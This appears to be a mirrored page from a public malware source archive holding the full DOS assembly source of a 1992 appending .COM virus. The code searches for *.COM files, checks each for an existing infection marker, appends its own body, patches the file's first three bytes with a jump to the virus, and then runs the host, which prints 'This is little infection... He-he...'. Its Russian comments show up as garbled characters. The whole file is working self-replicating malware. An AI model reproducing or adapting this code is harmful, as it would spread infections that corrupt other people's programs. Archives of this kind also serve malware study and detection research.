mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
166 lines
4.6 KiB
NASM
166 lines
4.6 KiB
NASM
|
; <20><><EFBFBD><EFBFBD><EFBFBD>쪨<EFBFBD> (<28><><EFBFBD> <20><><EFBFBD><EFBFBD>让) <20><><EFBFBD><EFBFBD><EFBFBD>, <20><>ࠦ<EFBFBD><E0A0A6>騩 .COM-<2D>ணࠬ<E0AEA3><E0A0AC>
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD>᪥, <20> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD>砫<EFBFBD> JMP.
|
|||
|
; <20><EFBFBD>ન <20><> <20><>直<EFBFBD> <20><><EFBFBD>筮<EFBFBD><E7ADAE><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
;
|
|||
|
; Copyright (c) 1992, Gogi&Givi International.
|
|||
|
;
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 0100h
|
|||
|
start:
|
|||
|
jmp virusstart ; <20><><EFBFBD><EFBFBD>室 <20><> <20><><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
mov ah,09h ; ⠪<><E2A0AA>, <20><><EFBFBD> <20>㤥<EFBFBD>
|
|||
|
int 21h ; <20> <20><><EFBFBD>⢮<EFBFBD> <20><><EFBFBD>
|
|||
|
mov ax,4C00h ; <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD>
|
|||
|
int 21h
|
|||
|
Message db 'This is little infection... He-he...',13,10,'$'
|
|||
|
; <20><> <20><><EFBFBD> <20><><EFBFBD> <20><>ଠ<EFBFBD><E0ACA0><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
virusstart: ; <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pushf
|
|||
|
push ax ; <20><><EFBFBD>࠭塞 <20><><EFBFBD>, <20><><EFBFBD>
|
|||
|
push bx ; ⮫쪮 <20><><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds ; <20><> <20><><EFBFBD><EFBFBD>, <20><><EFBFBD>쪮
|
|||
|
push es ; <20><><EFBFBD> <20>ࠢ<EFBFBD><E0A0A2>쭮...
|
|||
|
push si
|
|||
|
call SelfPoint
|
|||
|
SelfPoint: ; <20><>।<EFBFBD><E0A5A4>塞 <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pop si ; <20>室<EFBFBD>
|
|||
|
|
|||
|
cld ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࠢ<EFBFBD>
|
|||
|
push cs ; <20><><EFBFBD>⠢<EFBFBD><E2A0A2> ᥣ<><E1A5A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pop ds ; ॣ<><E0A5A3><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>祭<EFBFBD><E7A5AD>
|
|||
|
push cs ; <20> <20><><EFBFBD>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pop es
|
|||
|
mov di,0100h ; <20> <20>ਥ<EFBFBD><E0A8A5><EFBFBD><EFBFBD><EFBFBD> - 0100h,
|
|||
|
push si ; <20><>砫<EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>
|
|||
|
add si,original-SelfPoint ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> SI 㪠<>뢠<EFBFBD><EBA2A0> <20><>
|
|||
|
mov cx,3 ; <20>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
rep movsb ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>㥬 <20><> <20> <20><>砫<EFBFBD>
|
|||
|
pop si ; <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>
|
|||
|
|
|||
|
mov ah,1Ah ; <20><><EFBFBD>⠢<EFBFBD><E2A0A2> ᮡ<>⢥<EFBFBD><E2A2A5><EFBFBD><EFBFBD>
|
|||
|
mov dx,si ; DTA <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
add dx,VirusDTA-SelfPoint ; 21h <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD><EFBFBD>
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ah,4Eh ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FindFirst
|
|||
|
mov dx,si ; <20> ᮮ⢥<E1AEAE><E2A2A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>饩
|
|||
|
add dx,FileMask-SelfPoint ; <20><><EFBFBD>
|
|||
|
mov cx,32 ; <20> <20><>ਡ<EFBFBD>⮬ <20>⥭<EFBFBD><E2A5AD>/
|
|||
|
int 21h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20>⮡<EFBFBD> <20><>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jnc RepeatOpen ; <20>訡<EFBFBD><E8A8A1> <20><><EFBFBD> - <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0>
|
|||
|
|
|||
|
jmp OutVirus ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><>襫...
|
|||
|
|
|||
|
RepeatOpen:
|
|||
|
mov ax,3D02h ; <20><><EFBFBD><EFBFBD> 䠩<>
|
|||
|
mov dx,si ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>७<EFBFBD><E0A5AD><EFBFBD><EFBFBD>
|
|||
|
add dx,NameF-SelfPoint ; <20><>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
int 21h
|
|||
|
jc OutVirus ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20>訡<EFBFBD><E8A8A1><EFBFBD> <20><>室<EFBFBD><E5AEA4>
|
|||
|
|
|||
|
mov bx,ax ; <20><><EFBFBD>쬥<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9>,
|
|||
|
; <20> <20>㤥<EFBFBD> <20><>ঠ<EFBFBD><E0A6A0><EFBFBD><EFBFBD> <20><> BX
|
|||
|
|
|||
|
mov ah,3Fh ; <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>騥
|
|||
|
mov dx,si ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|||
|
add dx,Original-SelfPoint ; <20>ᯮ<EFBFBD><E1AFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov cx,3 ; <20><><EFBFBD><EFBFBD><EFBFBD> <20>㤥<EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
int 21h
|
|||
|
jc OutVirus ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD>ਬ <20><> <20>訡<EFBFBD><E8A8A1>...
|
|||
|
push bx
|
|||
|
mov bx,dx
|
|||
|
cmp byte ptr [bx],'<27>' ; <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20>⮬ 䠩<><E4A0A9>
|
|||
|
pop bx ; ⮦<> ᭠砫<E1ADA0> <20><><EFBFBD><EFBFBD>室?
|
|||
|
;
|
|||
|
je CloseNotInfect ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD>!
|
|||
|
; <20><>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>筥<EFBFBD>
|
|||
|
; <20><EFBFBD><E0AEA2><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
|
|||
|
mov ax,4202h ; <20><>룠<EFBFBD><EBA3A0> <20> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
xor cx,cx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD>ᨫ<EFBFBD><E1A8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
xor dx,dx
|
|||
|
int 21h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> AX <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jc OutVirus ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><>砫<EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20> <20><><EFBFBD>,
|
|||
|
; <20><><EFBFBD><EFBFBD>筮, <20>訡<EFBFBD><E8A8A1>
|
|||
|
push ax
|
|||
|
|
|||
|
mov ah,40h ; <20><><EFBFBD><EFBFBD>襬
|
|||
|
mov dx,si ; ⥫<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
sub dx,SelfPoint-VirusStart ; <20> 䠩<>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov cx,VirusEnd-VirusStart ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⢮ <20><><EFBFBD><EFBFBD>
|
|||
|
int 21h
|
|||
|
|
|||
|
pop ax
|
|||
|
jc OutVirus ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>訡<EFBFBD><E8A8A1> -
|
|||
|
; <20><><EFBFBD><EFBFBD>, ⠬, <20><>९<EFBFBD><E0A5AF><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
|
|||
|
sub ax,3 ; <20><><EFBFBD><EFBFBD>⠥<EFBFBD> 3 - <20>⮡<EFBFBD>
|
|||
|
push bx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>㤠 <20><><EFBFBD><EFBFBD>
|
|||
|
mov bx,si
|
|||
|
sub bx,SelfPoint-VirusStart
|
|||
|
mov word ptr cs:[bx+1],ax ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov byte ptr [bx],'<27>' ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>室<EFBFBD> (<28>
|
|||
|
; <20>।<EFBFBD><E0A5A4><EFBFBD><EFBFBD> ᥣ<><E1A5A3><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
pop bx
|
|||
|
|
|||
|
mov ax,4200h ; <20> ⥯<><E2A5AF><EFBFBD> <20> <20><>砫<EFBFBD>
|
|||
|
xor cx,cx ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
xor dx,dx
|
|||
|
int 21h
|
|||
|
jc OutVirus ; <20><EFBFBD>ઠ <20><> <20>訡<EFBFBD><E8A8A1>
|
|||
|
|
|||
|
mov ah,40h ; <20> <20><><EFBFBD><EFBFBD>襬 <20>㤠
|
|||
|
mov dx,si ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>室<EFBFBD>
|
|||
|
sub dx,SelfPoint-VirusStart ; <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD>᭮<EFBFBD>
|
|||
|
mov cx,3 ; ⥫<>
|
|||
|
int 21h
|
|||
|
jc OutVirus ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><EFBFBD>ਬ <20>訡<EFBFBD><E8A8A1>
|
|||
|
|
|||
|
mov ah,3Eh ; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
int 21h ; (<28><> 㦥 <20><>ࠦ<EFBFBD><E0A0A6> -
|
|||
|
jmp OutVirus ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> ࠡ<>⠥<EFBFBD>)
|
|||
|
|
|||
|
CloseNotInfect:
|
|||
|
mov ah,3Eh ; <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0> <20><><EFBFBD><EFBFBD><EFBFBD>室<EFBFBD>騩
|
|||
|
int 21h ; 䠩<>
|
|||
|
|
|||
|
mov dx,si
|
|||
|
add dx,FileMask-SelfPoint ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> FindNext
|
|||
|
mov ah,4Fh
|
|||
|
int 21h
|
|||
|
jc OutVirus ; <20>訡<EFBFBD><E8A8A1> - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD>졠
|
|||
|
jmp RepeatOpen ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD>室 <20><> <20><><EFBFBD><EFBFBD><EFBFBD>⨥
|
|||
|
|
|||
|
OutVirus:
|
|||
|
pop si ; <20>, <20><><EFBFBD><EFBFBD>筮 <20><>,
|
|||
|
pop es ; <20><><EFBFBD> <20><> ᢥ<><E1A2A5>
|
|||
|
pop ds ; <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
mov si,0100h ; <20><><EFBFBD><EFBFBD>ᨬ <20> <20>⥪ <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push si ; <20><>砫<EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>
|
|||
|
ret ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> RET
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
|
|||
|
VirusDTA db 30 dup (0) ; <20><><EFBFBD> DTA
|
|||
|
NameF db 13 dup (0) ; <20><><EFBFBD> <20>㤥<EFBFBD> <20><><EFBFBD> 䠩<><E4A0A9>
|
|||
|
FileMask db '*.cOm',(0) ; <20><><EFBFBD> ⠪<><E2A0AA> <20><><EFBFBD>ᨢ<EFBFBD><E1A8A2>
|
|||
|
; <20><>᪠
|
|||
|
original:
|
|||
|
mov dx,offset Message ; <20> <20><><EFBFBD> <20>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
VirusEnd: ; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD>᪨<EFBFBD>,
|
|||
|
; <20><> <20><><EFBFBD><EFBFBD><EFBFBD>!)
|
|||
|
end start
|